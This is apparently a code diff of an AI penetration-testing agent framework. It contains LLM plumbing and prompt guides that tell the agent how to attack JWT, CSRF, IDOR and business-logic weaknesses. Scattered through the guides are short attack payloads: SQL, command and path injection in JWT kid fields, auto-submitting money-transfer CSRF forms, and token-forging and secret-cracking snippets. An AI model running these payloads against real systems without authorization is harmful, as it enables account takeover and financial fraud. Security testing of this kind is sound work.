system_message["content"] = self._add_cache_control_to_content(
system_message["content"]
)
cached_messages[0] = system_message
total_messages = len(cached_messages)
if total_messages > 1:
interval = self._calculate_cache_interval(total_messages)
cached_count = 0
for i in range(interval, total_messages, interval):
if cached_count >= 3:
break
if i < len(cached_messages):
message = cached_messages[i].copy()
message["content"] = self._add_cache_control_to_content(message["content"])
cached_messages[i] = message
cached_count += 1
return cached_messages
async def generate(
self,
conversation_history: list[dict[str, Any]],
scan_id: str | None = None,
step_number: int = 1,
) -> LLMResponse:
messages = [{"role": "system", "content": self.system_prompt}]
compressed_history = list(self.memory_compressor.compress_history(conversation_history))
conversation_history.clear()
conversation_history.extend(compressed_history)
messages.extend(compressed_history)
cached_messages = self._prepare_cached_messages(messages)
try:
response = await self._make_request(cached_messages)
self._update_usage_stats(response)
content = ""
if (
response.choices
and hasattr(response.choices[0], "message")
and response.choices[0].message
):
content = getattr(response.choices[0].message, "content", "") or ""
content = _truncate_to_first_function(content)
if "</function>" in content:
function_end_index = content.find("</function>") + len("</function>")
content = content[:function_end_index]
tool_invocations = parse_tool_invocations(content)
return LLMResponse(
scan_id=scan_id,
step_number=step_number,
role=StepRole.AGENT,
content=content,
tool_invocations=tool_invocations if tool_invocations else None,
)
except (ValueError, TypeError, RuntimeError):
logger.exception("Error in LLM generation")
return LLMResponse(
scan_id=scan_id,
step_number=step_number,
role=StepRole.AGENT,
content="An error occurred while generating the response",
tool_invocations=None,
)
@property
def usage_stats(self) -> dict[str, dict[str, int | float]]:
return {
"total": self._total_stats.to_dict(),
"last_request": self._last_request_stats.to_dict(),
}
def get_cache_config(self) -> dict[str, bool]:
return {
"enabled": self.config.enable_prompt_caching,
"supported": supports_prompt_caching(self.config.model_name),
}
async def _make_request(
self,
messages: list[dict[str, Any]],
) -> ModelResponse:
completion_args = {
"model": self.config.model_name,
"messages": messages,
"temperature": self.config.temperature,
"stop": ["</function>"],
}
queue = get_global_queue()
response = await queue.make_request(completion_args)
self._total_stats.requests += 1
self._last_request_stats = RequestStats(requests=1)
return response
def _update_usage_stats(self, response: ModelResponse) -> None:
try:
if hasattr(response, "usage") and response.usage:
input_tokens = getattr(response.usage, "prompt_tokens", 0)
output_tokens = getattr(response.usage, "completion_tokens", 0)
cached_tokens = 0
cache_creation_tokens = 0
if hasattr(response.usage, "prompt_tokens_details"):
prompt_details = response.usage.prompt_tokens_details
if hasattr(prompt_details, "cached_tokens"):
cached_tokens = prompt_details.cached_tokens or 0
if hasattr(response.usage, "cache_creation_input_tokens"):
cache_creation_tokens = response.usage.cache_creation_input_tokens or 0
else:
input_tokens = 0
output_tokens = 0
cached_tokens = 0
cache_creation_tokens = 0
try:
cost = completion_cost(response) or 0.0
except (ValueError, TypeError, RuntimeError) as e:
logger.warning(f"Failed to calculate cost: {e}")
cost = 0.0
self._total_stats.input_tokens += input_tokens
self._total_stats.output_tokens += output_tokens
self._total_stats.cached_tokens += cached_tokens
self._total_stats.cache_creation_tokens += cache_creation_tokens
self._total_stats.cost += cost
self._last_request_stats.input_tokens = input_tokens
self._last_request_stats.output_tokens = output_tokens
self._last_request_stats.cached_tokens = cached_tokens
self._last_request_stats.cache_creation_tokens = cache_creation_tokens
self._last_request_stats.cost = cost
if cached_tokens > 0:
logger.info(f"Cache hit: {cached_tokens} cached tokens, {input_tokens} new tokens")
if cache_creation_tokens > 0:
logger.info(f"Cache creation: {cache_creation_tokens} tokens written to cache")
logger.info(f"Usage stats: {self.usage_stats}")
except (AttributeError, TypeError, ValueError) as e:
logger.warning(f"Failed to update usage stats: {e}")

View File


@@ -0,0 +1,206 @@
import logging
import os
from typing import Any
import litellm
logger = logging.getLogger(__name__)
MAX_TOTAL_TOKENS = 100_000
MIN_RECENT_MESSAGES = 15
SUMMARY_PROMPT_TEMPLATE = """You are an agent performing context
condensation for a security agent. Your job is to compress scan data while preserving
ALL operationally critical information for continuing the security assessment.
CRITICAL ELEMENTS TO PRESERVE:
- Discovered vulnerabilities and potential attack vectors
- Scan results and tool outputs (compressed but maintaining key findings)
- Access credentials, tokens, or authentication details found
- System architecture insights and potential weak points
- Progress made in the assessment
- Failed attempts and dead ends (to avoid duplication)
- Any decisions made about the testing approach
COMPRESSION GUIDELINES:
- Preserve exact technical details (URLs, paths, parameters, payloads)
- Summarize verbose tool outputs while keeping critical findings
- Maintain version numbers, specific technologies identified
- Keep exact error messages that might indicate vulnerabilities
- Compress repetitive or similar findings into consolidated form
Remember: Another security agent will use this summary to continue the assessment.
They must be able to pick up exactly where you left off without losing any
operational advantage or context needed to find vulnerabilities.
CONVERSATION SEGMENT TO SUMMARIZE:
{conversation}
Provide a technically precise summary that preserves all operational security context while
keeping the summary concise and to the point."""
def _count_tokens(text: str, model: str) -> int:
try:
count = litellm.token_counter(model=model, text=text)
return int(count)
except Exception:
logger.exception("Failed to count tokens")
return len(text) // 4 # Rough estimate
def _get_message_tokens(msg: dict[str, Any], model: str) -> int:
content = msg.get("content", "")
if isinstance(content, str):
return _count_tokens(content, model)
if isinstance(content, list):
return sum(
_count_tokens(item.get("text", ""), model)
for item in content
if isinstance(item, dict) and item.get("type") == "text"
)
return 0
def _extract_message_text(msg: dict[str, Any]) -> str:
content = msg.get("content", "")
if isinstance(content, str):
return content
if isinstance(content, list):
parts = []
for item in content:
if isinstance(item, dict):
if item.get("type") == "text":
parts.append(item.get("text", ""))
elif item.get("type") == "image_url":
parts.append("[IMAGE]")
return " ".join(parts)
return str(content)
def _summarize_messages(
messages: list[dict[str, Any]],
model: str,
) -> dict[str, Any]:
if not messages:
empty_summary = "<context_summary message_count='0'>{text}</context_summary>"
return {
"role": "assistant",
"content": empty_summary.format(text="No messages to summarize"),
}
formatted = []
for msg in messages:
role = msg.get("role", "unknown")
text = _extract_message_text(msg)
formatted.append(f"{role}: {text}")
conversation = "\n".join(formatted)
prompt = SUMMARY_PROMPT_TEMPLATE.format(conversation=conversation)
try:
completion_args = {
"model": model,
"messages": [{"role": "user", "content": prompt}],
}
response = litellm.completion(**completion_args)
summary = response.choices[0].message.content
summary_msg = "<context_summary message_count='{count}'>{text}</context_summary>"
return {
"role": "assistant",
"content": summary_msg.format(count=len(messages), text=summary),
}
    except Exception:
        logger.exception("Failed to summarize messages")
        # Fallback: return the first message of the chunk so some context survives
        return messages[0]
def _handle_images(messages: list[dict[str, Any]], max_images: int) -> None:
image_count = 0
for msg in reversed(messages):
content = msg.get("content", [])
if isinstance(content, list):
for item in content:
if isinstance(item, dict) and item.get("type") == "image_url":
                    if image_count >= max_images:
                        item.clear()  # drop the stale image_url key before repurposing as text
                        item.update(
{
"type": "text",
"text": "[Previously attached image removed to preserve context]",
}
)
else:
image_count += 1
class MemoryCompressor:
def __init__(
self,
max_images: int = 3,
model_name: str | None = None,
):
self.max_images = max_images
self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
if not self.model_name:
raise ValueError("STRIX_LLM environment variable must be set and not empty")
def compress_history(
self,
messages: list[dict[str, Any]],
) -> list[dict[str, Any]]:
"""Compress conversation history to stay within token limits.
Strategy:
1. Handle image limits first
2. Keep all system messages
3. Keep minimum recent messages
4. Summarize older messages when total tokens exceed limit
The compression preserves:
- All system messages unchanged
- Most recent messages intact
- Critical security context in summaries
- Recent images for visual context
- Technical details and findings
"""
if not messages:
return messages
_handle_images(messages, self.max_images)
system_msgs = []
regular_msgs = []
for msg in messages:
if msg.get("role") == "system":
system_msgs.append(msg)
else:
regular_msgs.append(msg)
recent_msgs = regular_msgs[-MIN_RECENT_MESSAGES:]
old_msgs = regular_msgs[:-MIN_RECENT_MESSAGES]
# Type assertion since we ensure model_name is not None in __init__
model_name: str = self.model_name # type: ignore[assignment]
total_tokens = sum(
_get_message_tokens(msg, model_name) for msg in system_msgs + regular_msgs
)
if total_tokens <= MAX_TOTAL_TOKENS * 0.9:
return messages
compressed = []
chunk_size = 10
for i in range(0, len(old_msgs), chunk_size):
chunk = old_msgs[i : i + chunk_size]
summary = _summarize_messages(chunk, model_name)
if summary:
compressed.append(summary)
return system_msgs + compressed + recent_msgs

View File


@@ -0,0 +1,63 @@
import asyncio
import logging
import threading
import time
from typing import Any
from litellm import ModelResponse, completion
from tenacity import retry, stop_after_attempt, wait_exponential
logger = logging.getLogger(__name__)
class LLMRequestQueue:
def __init__(self, max_concurrent: int = 6, delay_between_requests: float = 1.0):
self.max_concurrent = max_concurrent
self.delay_between_requests = delay_between_requests
self._semaphore = threading.BoundedSemaphore(max_concurrent)
self._last_request_time = 0.0
self._lock = threading.Lock()
async def make_request(self, completion_args: dict[str, Any]) -> ModelResponse:
try:
while not self._semaphore.acquire(timeout=0.2):
await asyncio.sleep(0.1)
with self._lock:
now = time.time()
time_since_last = now - self._last_request_time
sleep_needed = max(0, self.delay_between_requests - time_since_last)
self._last_request_time = now + sleep_needed
if sleep_needed > 0:
await asyncio.sleep(sleep_needed)
return await self._reliable_request(completion_args)
finally:
self._semaphore.release()
@retry( # type: ignore[misc]
stop=stop_after_attempt(15),
wait=wait_exponential(multiplier=1.2, min=1, max=300),
reraise=True,
)
async def _reliable_request(self, completion_args: dict[str, Any]) -> ModelResponse:
response = completion(**completion_args, stream=False)
if isinstance(response, ModelResponse):
return response
self._raise_unexpected_response()
raise RuntimeError("Unreachable code")
def _raise_unexpected_response(self) -> None:
raise RuntimeError("Unexpected response type")
_global_queue: LLMRequestQueue | None = None
def get_global_queue() -> LLMRequestQueue:
global _global_queue # noqa: PLW0603
if _global_queue is None:
_global_queue = LLMRequestQueue()
return _global_queue

strix/llm/utils.py Normal file

@@ -0,0 +1,84 @@
import re
from typing import Any
def _truncate_to_first_function(content: str) -> str:
if not content:
return content
function_starts = [match.start() for match in re.finditer(r"<function=", content)]
if len(function_starts) >= 2:
second_function_start = function_starts[1]
return content[:second_function_start].rstrip()
return content
def parse_tool_invocations(content: str) -> list[dict[str, Any]] | None:
content = _fix_stopword(content)
tool_invocations: list[dict[str, Any]] = []
fn_regex_pattern = r"<function=([^>]+)>\n?(.*?)</function>"
fn_param_regex_pattern = r"<parameter=([^>]+)>(.*?)</parameter>"
fn_matches = re.finditer(fn_regex_pattern, content, re.DOTALL)
for fn_match in fn_matches:
fn_name = fn_match.group(1)
fn_body = fn_match.group(2)
param_matches = re.finditer(fn_param_regex_pattern, fn_body, re.DOTALL)
args = {}
for param_match in param_matches:
param_name = param_match.group(1)
param_value = param_match.group(2).strip()
args[param_name] = param_value
tool_invocations.append({"toolName": fn_name, "args": args})
return tool_invocations if tool_invocations else None
def _fix_stopword(content: str) -> str:
if "<function=" in content and content.count("<function=") == 1:
if content.endswith("</"):
content = content.rstrip() + "function>"
elif not content.rstrip().endswith("</function>"):
content = content + "\n</function>"
return content
def format_tool_call(tool_name: str, args: dict[str, Any]) -> str:
xml_parts = [f"<function={tool_name}>"]
for key, value in args.items():
xml_parts.append(f"<parameter={key}>{value}</parameter>")
xml_parts.append("</function>")
return "\n".join(xml_parts)
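A minimal round trip through the two helpers above (reproduced here in trimmed form so the sketch is self-contained; the tool name is illustrative):

```python
import re

def format_tool_call(tool_name, args):
    parts = [f"<function={tool_name}>"]
    parts += [f"<parameter={k}>{v}</parameter>" for k, v in args.items()]
    parts.append("</function>")
    return "\n".join(parts)

def parse_tool_invocations(content):
    # Same regexes as the module above, minus the stopword-repair step.
    calls = []
    for fn in re.finditer(r"<function=([^>]+)>\n?(.*?)</function>", content, re.DOTALL):
        args = {
            p.group(1): p.group(2).strip()
            for p in re.finditer(r"<parameter=([^>]+)>(.*?)</parameter>", fn.group(2), re.DOTALL)
        }
        calls.append({"toolName": fn.group(1), "args": args})
    return calls or None

xml = format_tool_call("browser_goto", {"url": "https://example.com"})
print(parse_tool_invocations(xml))
# [{'toolName': 'browser_goto', 'args': {'url': 'https://example.com'}}]
```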
def clean_content(content: str) -> str:
if not content:
return ""
content = _fix_stopword(content)
tool_pattern = r"<function=[^>]+>.*?</function>"
cleaned = re.sub(tool_pattern, "", content, flags=re.DOTALL)
hidden_xml_patterns = [
r"<inter_agent_message>.*?</inter_agent_message>",
r"<agent_completion_report>.*?</agent_completion_report>",
]
for pattern in hidden_xml_patterns:
cleaned = re.sub(pattern, "", cleaned, flags=re.DOTALL | re.IGNORECASE)
cleaned = re.sub(r"\n\s*\n", "\n\n", cleaned)
return cleaned.strip()

strix/prompts/__init__.py Normal file

@@ -0,0 +1,113 @@
from pathlib import Path
from jinja2 import Environment
def get_available_prompt_modules() -> dict[str, list[str]]:
modules_dir = Path(__file__).parent
available_modules = {}
for category_dir in modules_dir.iterdir():
if category_dir.is_dir() and not category_dir.name.startswith("__"):
category_name = category_dir.name
modules = []
for file_path in category_dir.glob("*.jinja"):
module_name = file_path.stem
modules.append(module_name)
if modules:
available_modules[category_name] = sorted(modules)
return available_modules
def get_all_module_names() -> set[str]:
all_modules = set()
for category_modules in get_available_prompt_modules().values():
all_modules.update(category_modules)
return all_modules
def validate_module_names(module_names: list[str]) -> dict[str, list[str]]:
available_modules = get_all_module_names()
valid_modules = []
invalid_modules = []
for module_name in module_names:
if module_name in available_modules:
valid_modules.append(module_name)
else:
invalid_modules.append(module_name)
return {"valid": valid_modules, "invalid": invalid_modules}
def generate_modules_description() -> str:
available_modules = get_available_prompt_modules()
if not available_modules:
return "No prompt modules available"
description_parts = []
for category, modules in available_modules.items():
modules_str = ", ".join(modules)
description_parts.append(f"{category} ({modules_str})")
description = (
f"List of prompt modules to load for this agent (max 3). "
f"Available modules: {', '.join(description_parts)}. "
)
example_modules = []
for modules in available_modules.values():
example_modules.extend(modules[:2])
if len(example_modules) >= 2:
break
if example_modules:
example = f"Example: {example_modules[:2]} for specialized agent"
description += example
return description
def load_prompt_modules(module_names: list[str], jinja_env: Environment) -> dict[str, str]:
import logging
logger = logging.getLogger(__name__)
module_content = {}
prompts_dir = Path(__file__).parent
available_modules = get_available_prompt_modules()
for module_name in module_names:
try:
module_path = None
if "/" in module_name:
module_path = f"{module_name}.jinja"
else:
for category, modules in available_modules.items():
if module_name in modules:
module_path = f"{category}/{module_name}.jinja"
break
if not module_path:
root_candidate = f"{module_name}.jinja"
if (prompts_dir / root_candidate).exists():
module_path = root_candidate
if module_path and (prompts_dir / module_path).exists():
template = jinja_env.get_template(module_path)
var_name = module_name.split("/")[-1]
module_content[var_name] = template.render()
logger.info(f"Loaded prompt module: {module_name} -> {var_name}")
else:
logger.warning(f"Prompt module not found: {module_name}")
except (FileNotFoundError, OSError, ValueError) as e:
logger.warning(f"Failed to load prompt module {module_name}: {e}")
return module_content

View File


@@ -0,0 +1,41 @@
<coordination_role>
You are a COORDINATION AGENT ONLY. You do NOT perform any security testing, vulnerability assessment, or technical work yourself.
Your ONLY responsibilities:
1. Create specialized agents for specific security tasks
2. Monitor agent progress and coordinate between them
3. Compile final scan reports from agent findings
4. Manage agent communication and dependencies
CRITICAL RESTRICTIONS:
- NEVER perform vulnerability testing or security assessments
- NEVER write detailed vulnerability reports (only compile final summaries)
- ONLY use agent_graph and finish tools for coordination
- You can create agents throughout the scan process, depending on the task and findings, not just at the beginning!
</coordination_role>
<agent_management>
BEFORE CREATING AGENTS:
1. Analyze the target scope and break into independent tasks
2. Check existing agents to avoid duplication
3. Create agents with clear, specific objectives and non-overlapping scopes
AGENT TYPES YOU CAN CREATE:
- Reconnaissance: subdomain enum, port scanning, tech identification, etc.
- Vulnerability Testing: SQL injection, XSS, auth bypass, IDOR, RCE, SSRF, etc. Can be black-box or white-box.
- Direct vulnerability-testing agents to implement a hierarchical workflow (per finding: discover, verify, report, fix): each testing agent creates validation agents to verify its findings, which spawn reporting agents for documentation, which in turn create fix agents for remediation
COORDINATION GUIDELINES:
- Ensure clear task boundaries and success criteria
- Terminate redundant agents when objectives overlap
- Use message passing for agent communication
</agent_management>
<final_responsibilities>
When all agents complete:
1. Collect findings from all agents
2. Compile a final scan summary report
3. Use finish tool to complete the assessment
Your value is in orchestration, not execution.
</final_responsibilities>

View File


@@ -0,0 +1,129 @@
<authentication_jwt_guide>
<title>AUTHENTICATION & JWT VULNERABILITIES</title>
<critical>Authentication flaws lead to complete account takeover. JWT misconfigurations are everywhere.</critical>
<jwt_structure>
header.payload.signature
- Header: {"alg":"HS256","typ":"JWT"}
- Payload: {"sub":"1234","name":"John","iat":1516239022}
- Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
</jwt_structure>
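The header and payload segments decode with nothing more than base64url and JSON — a quick sketch for inspecting captured tokens (no signature check is performed; the token below carries the example claims above):

```python
import base64
import json

def decode_segment(seg: str) -> dict:
    seg += "=" * (-len(seg) % 4)  # restore the stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(seg))

token = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"
    ".eyJzdWIiOiIxMjM0In0"
    ".signature-not-checked"
)
header_b64, payload_b64, _sig = token.split(".")
print(decode_segment(header_b64))   # {'alg': 'HS256', 'typ': 'JWT'}
print(decode_segment(payload_b64))  # {'sub': '1234'}
```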
<common_attacks>
<algorithm_confusion>
RS256 to HS256:
- Change RS256 to HS256 in header
- Use public key as HMAC secret
- Sign token with public key (often in /jwks.json or /.well-known/)
</algorithm_confusion>
<none_algorithm>
- Set "alg": "none" in header
- Remove signature completely (keep the trailing dot)
</none_algorithm>
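Crafting an alg:none token needs only the standard library — a sketch (the claims are illustrative placeholders):

```python
import base64
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "1234", "role": "admin"}).encode())
token = f"{header}.{payload}."  # signature removed, trailing dot kept
print(token)
```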
<weak_secrets>
Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-bit-secret'
</weak_secrets>
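Checking a captured HS256 token against a wordlist is a few lines of stdlib hmac — a self-contained sketch (here the "captured" signature is generated with 'secret' purely for demonstration):

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(signing_input: bytes, secret: bytes) -> str:
    return b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())

header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "1234"}).encode())
signing_input = f"{header}.{payload}".encode()
captured_sig = sign_hs256(signing_input, b"secret")  # stands in for a real token's signature

recovered = None
for candidate in ["password", "123456", "key", "jwt_secret", "secret"]:
    if hmac.compare_digest(sign_hs256(signing_input, candidate.encode()), captured_sig):
        recovered = candidate
        break
print("recovered secret:", recovered)  # recovered secret: secret
```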
<kid_manipulation>
- SQL Injection: "kid": "key' UNION SELECT 'secret'--"
- Command injection: "kid": "|sleep 10"
- Path traversal: "kid": "../../../../../../dev/null"
</kid_manipulation>
</common_attacks>
<advanced_techniques>
<jwk_injection>
Embed public key in token header:
{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
</jwk_injection>
<jku_manipulation>
Set jku/x5u to attacker-controlled URL hosting malicious JWKS
</jku_manipulation>
<timing_attacks>
Extract signature byte-by-byte using verification timing differences
</timing_attacks>
</advanced_techniques>
<oauth_vulnerabilities>
<authorization_code_theft>
- Exploit redirect_uri with open redirects, subdomain takeover, parameter pollution
- Missing/predictable state parameter = CSRF
- PKCE downgrade: remove code_challenge parameter
</authorization_code_theft>
</oauth_vulnerabilities>
<saml_attacks>
- Signature exclusion: remove signature element
- Signature wrapping: inject assertions
- XXE in SAML responses
</saml_attacks>
<session_attacks>
- Session fixation: force known session ID
- Session puzzling: mix different session objects
- Race conditions in session generation
</session_attacks>
<password_reset_flaws>
- Predictable tokens: MD5(timestamp), sequential numbers
- Host header injection for reset link poisoning
- Race condition resets
</password_reset_flaws>
<mfa_bypass>
- Response manipulation: change success:false to true
- Status code manipulation: 403 to 200
- Brute force with no rate limiting
- Backup code abuse
</mfa_bypass>
<advanced_bypasses>
<unicode_normalization>
Different representations of admin@example.com: ａdmin@example.com (fullwidth 'ａ'), аdmin@example.com (Cyrillic 'а')
</unicode_normalization>
<authentication_chaining>
- JWT + SQLi: kid parameter with SQL injection
- OAuth + XSS: steal tokens via XSS
- SAML + XXE + SSRF: chain for internal access
</authentication_chaining>
</advanced_bypasses>
<tools>
- jwt_tool: Comprehensive JWT testing
- Check endpoints: /login, /oauth/authorize, /saml/login, /.well-known/openid-configuration, /jwks.json
</tools>
<validation>
To confirm authentication flaw:
1. Demonstrate account access without credentials
2. Show privilege escalation
3. Prove token forgery works
4. Bypass authentication/2FA requirements
5. Maintain persistent access
</validation>
<false_positives>
NOT a vulnerability if:
- Requires valid credentials
- Only affects own session
- Proper signature validation
- Token expiration enforced
- Rate limiting prevents brute force
</false_positives>
<impact>
- Account takeover: access other users' accounts
- Privilege escalation: user to admin
- Token forgery: create valid tokens
- Bypass mechanisms: skip auth/2FA
- Persistent access: survives logout
</impact>
<remember>Focus on RS256->HS256, weak secrets, and none algorithm first. Modern apps use multiple auth methods simultaneously - find gaps in integration.</remember>
</authentication_jwt_guide>

View File


@@ -0,0 +1,143 @@
<business_logic_flaws_guide>
<title>BUSINESS LOGIC FLAWS - OUTSMARTING THE APPLICATION</title>
<critical>Business logic flaws bypass all technical security controls by exploiting flawed assumptions in application workflow. Often the highest-paying vulnerabilities.</critical>
<discovery_techniques>
- Map complete user journeys and state transitions
- Document developer assumptions
- Find edge cases in workflows
- Look for missing validation steps
- Identify trust boundaries
</discovery_techniques>
<high_value_targets>
<financial_workflows>
- Price manipulation (negative quantities, decimal truncation)
- Currency conversion abuse (buy weak, refund strong)
- Discount/coupon stacking
- Payment method switching after verification
- Cart manipulation during checkout
</financial_workflows>
<account_management>
- Registration race conditions (same email/username)
- Account type elevation
- Trial period extension
- Subscription downgrade with feature retention
</account_management>
<authorization_flaws>
- Function-level bypass (accessing admin functions as user)
- Object reference manipulation
- Permission inheritance bugs
- Multi-tenancy isolation failures
</authorization_flaws>
</high_value_targets>
<exploitation_techniques>
<race_conditions>
Use race conditions to:
- Double-spend vouchers/credits
- Bypass rate limits
- Create duplicate accounts
- Exploit TOCTOU vulnerabilities
</race_conditions>
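The double-spend pattern reduces to a check-then-act window; a toy illustration with threads (the sleep stands in for server-side processing time, and the in-memory dict for a balance record):

```python
import threading
import time

account = {"credits": 1}
redemptions = 0

def redeem() -> None:
    global redemptions
    # Check-then-act without a lock: every thread passes the balance
    # check before any of them performs the debit (TOCTOU window).
    if account["credits"] > 0:
        time.sleep(0.05)  # simulated processing delay widens the window
        account["credits"] -= 1
        redemptions += 1

threads = [threading.Thread(target=redeem) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(f"single-use voucher redeemed {redemptions} times")  # typically 10
```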
<state_manipulation>
- Skip workflow steps
- Replay previous states
- Force invalid state transitions
- Manipulate hidden parameters
</state_manipulation>
<input_manipulation>
- Type confusion: string where int expected
- Boundary values: 0, -1, MAX_INT
- Format abuse: scientific notation, Unicode
- Encoding tricks: double encoding, mixed encoding
</input_manipulation>
</exploitation_techniques>
<common_flaws>
<shopping_cart>
- Add items with negative price
- Modify prices client-side
- Apply expired coupons
- Stack incompatible discounts
- Change currency after price lock
</shopping_cart>
<payment_processing>
- Complete order before payment
- Partial payment acceptance
- Payment replay attacks
- Void after delivery
- Refund more than paid
</payment_processing>
<user_lifecycle>
- Premium features in trial
- Account deletion bypasses
- Privilege retention after demotion
- Transfer restrictions bypass
</user_lifecycle>
</common_flaws>
<advanced_techniques>
<business_constraint_violations>
- Exceed account limits
- Bypass geographic restrictions
- Violate temporal constraints
- Break dependency chains
</business_constraint_violations>
<workflow_abuse>
- Parallel execution of exclusive processes
- Recursive operations (infinite loops)
- Asynchronous timing exploitation
- Callback manipulation
</workflow_abuse>
</advanced_techniques>
<validation>
To confirm business logic flaw:
1. Demonstrate financial impact
2. Show consistent reproduction
3. Prove bypass of intended restrictions
4. Document assumption violation
5. Quantify potential damage
</validation>
<false_positives>
NOT a business logic flaw if:
- Requires technical vulnerability (SQLi, XSS)
- Working as designed (bad design ≠ vulnerability)
- Only affects display/UI
- No security impact
- Requires privileged access
</false_positives>
<impact>
- Financial loss (direct monetary impact)
- Unauthorized access to features/data
- Service disruption
- Compliance violations
- Reputation damage
</impact>
<pro_tips>
1. Think like a malicious user, not a developer
2. Question every assumption
3. Test boundary conditions obsessively
4. Combine multiple small issues
5. Focus on money flows
6. Check state machines thoroughly
7. Abuse features, don't break them
8. Document business impact clearly
9. Test integration points
10. Time is often a factor - exploit it
</pro_tips>
<remember>Business logic flaws are about understanding and exploiting the application's rules, not breaking them with technical attacks. The best findings come from deep understanding of the business domain.</remember>
</business_logic_flaws_guide>

View File


@@ -0,0 +1,168 @@
<csrf_vulnerability_guide>
<title>CROSS-SITE REQUEST FORGERY (CSRF) - ADVANCED EXPLOITATION</title>
<critical>CSRF forces authenticated users to execute unwanted actions, exploiting the trust a site has in the user's browser.</critical>
<high_value_targets>
- Password/email change forms
- Money transfer/payment functions
- Account deletion/deactivation
- Permission/role changes
- API key generation/regeneration
- OAuth connection/disconnection
- 2FA enable/disable
- Privacy settings modification
- Admin functions
- File uploads/deletions
</high_value_targets>
<discovery_techniques>
<token_analysis>
Common token names: csrf_token, csrftoken, _csrf, authenticity_token, __RequestVerificationToken, X-CSRF-TOKEN
Check if tokens are:
- Actually validated (remove and test)
- Tied to user session
- Reusable across requests
- Present in GET requests
- Predictable or static
</token_analysis>
<http_methods>
- Test if POST endpoints accept GET
- Try method override headers: _method, X-HTTP-Method-Override
- Check if PUT/DELETE lack protection
</http_methods>
</discovery_techniques>
<exploitation_techniques>
<basic_forms>
HTML form auto-submit:
<form action="https://target.com/transfer" method="POST">
<input name="amount" value="1000">
<input name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>
</basic_forms>
<json_csrf>
For JSON endpoints:
<form enctype="text/plain" action="https://target.com/api">
<input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
</form>
</json_csrf>
<multipart_csrf>
For file uploads:
Use XMLHttpRequest with credentials
Generate multipart/form-data boundaries
</multipart_csrf>
</exploitation_techniques>
<bypass_techniques>
<token_bypasses>
- Null token: remove parameter entirely
- Empty token: csrf_token=
- Token from own account: use your valid token
- Token fixation: force known token value
- Method interchange: GET token used for POST
</token_bypasses>
<header_bypasses>
- Referer bypass: use data: URI, about:blank
- Origin bypass: null origin via sandboxed iframe
- CORS misconfigurations
</header_bypasses>
<content_type_tricks>
- Change multipart to application/x-www-form-urlencoded
- Use text/plain for JSON endpoints
- Exploit parsers that accept multiple formats
</content_type_tricks>
</bypass_techniques>
<advanced_techniques>
<subdomain_csrf>
- XSS on subdomain = CSRF on main domain
- Cookie scope abuse (domain=.example.com)
- Subdomain takeover for CSRF
</subdomain_csrf>
<csrf_login>
- Force victim to login as attacker
- Plant backdoors in victim's account
- Access victim's future data
</csrf_login>
<csrf_logout>
- Force logout → login CSRF → account takeover
</csrf_logout>
<double_submit_csrf>
If using double-submit cookies:
- Set cookie via XSS/subdomain
- Cookie injection via header injection
- Cookie tossing attacks
</double_submit_csrf>
</advanced_techniques>
<special_contexts>
<websocket_csrf>
- Cross-origin WebSocket hijacking
- Steal tokens from WebSocket messages
</websocket_csrf>
<graphql_csrf>
- GET requests with query parameter
- Batched mutations
- Subscription abuse
</graphql_csrf>
<api_csrf>
- Bearer tokens in URL parameters
- API keys in GET requests
- Insecure CORS policies
</api_csrf>
</special_contexts>
<validation>
To confirm CSRF:
1. Create working proof-of-concept
2. Test across browsers
3. Verify action completes successfully
4. No user interaction required (beyond visiting page)
5. Works with active session
</validation>
<false_positives>
NOT CSRF if:
- Requires valid CSRF token
- SameSite cookies properly configured
- Proper origin/referer validation
- User interaction required
- Only affects non-sensitive actions
</false_positives>
<impact>
- Account takeover
- Financial loss
- Data modification/deletion
- Privilege escalation
- Privacy violations
</impact>
<pro_tips>
1. Check all state-changing operations
2. Test file upload endpoints
3. Look for token disclosure in URLs
4. Chain with XSS for token theft
5. Check mobile API endpoints
6. Test CORS configurations
7. Verify SameSite cookie settings
8. Look for method override possibilities
9. Test WebSocket endpoints
10. Document clear attack scenario
</pro_tips>
<remember>Modern CSRF requires creativity - look for token leaks, chain with other vulnerabilities, and focus on high-impact actions. SameSite cookies are not always properly configured.</remember>
</csrf_vulnerability_guide>

View File


@@ -0,0 +1,164 @@
<idor_vulnerability_guide>
<title>INSECURE DIRECT OBJECT REFERENCE (IDOR) - ELITE TECHNIQUES</title>
<critical>IDORs are among the HIGHEST IMPACT vulnerabilities - direct unauthorized data access and account takeover.</critical>
<discovery_techniques>
<parameter_analysis>
- Numeric IDs: user_id=123, account=456
- UUID/GUID patterns: id=550e8400-e29b-41d4-a716-446655440000
- Encoded IDs: Base64, hex, custom encoding
- Composite IDs: user-org-123-456, ACCT:2024:00123
- Hash-based IDs: Check if predictable (MD5 of sequential numbers)
- Object references in: URLs, POST bodies, headers, cookies, JWT tokens
</parameter_analysis>
<advanced_enumeration>
- Boundary values: 0, -1, null, empty string, max int
- Different formats: {"id":123} vs {"id":"123"}
- ID patterns: increment, decrement, similar patterns
- Wildcard testing: *, %, _, all
- Array notation: id[]=123&id[]=456
</advanced_enumeration>
</discovery_techniques>
<high_value_targets>
- User profiles and PII
- Financial records/transactions
- Private messages/communications
- Medical records
- API keys/secrets
- Internal documents
- Admin functions
- Export endpoints
- Backup files
- Debug information
</high_value_targets>
<exploitation_techniques>
<direct_access>
Simple increment/decrement:
/api/user/123 → /api/user/124
/download?file=report_2024_01.pdf → report_2024_02.pdf
</direct_access>
<mass_enumeration>
Automate ID ranges:
for i in range(1, 10000):
/api/user/{i}/data
</mass_enumeration>
